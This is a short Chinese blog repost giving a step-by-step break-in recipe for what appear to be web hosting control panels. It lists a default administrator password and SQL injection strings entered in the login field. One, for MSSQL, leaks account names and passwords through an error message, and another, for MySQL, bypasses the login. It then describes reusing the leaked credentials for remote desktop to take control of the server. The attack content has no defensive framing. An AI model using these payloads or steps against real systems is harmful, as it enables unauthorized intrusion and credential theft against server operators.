2017-11-15 1453
1,在http://xxxxxx.com:8880这里,默认的管理员账户密码是admin 密码stepu
2,在https://xxxxx.com:8443
mssql版本
账号 ' union select top 1 login+char(124)+passwd from admin_aliases--
报错,爆出账号密码
登陆后server-->remote desktop账号密码一样 拿到服务器权限
mysql版本 'union select '-1 union select 1,1,1#'# 密码填 1
本文转hackfreer51CTO博客,原文链接:http://blog.51cto.com/pnig0s1992/496153,如需转载请自行联系原作者
版权声明:本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。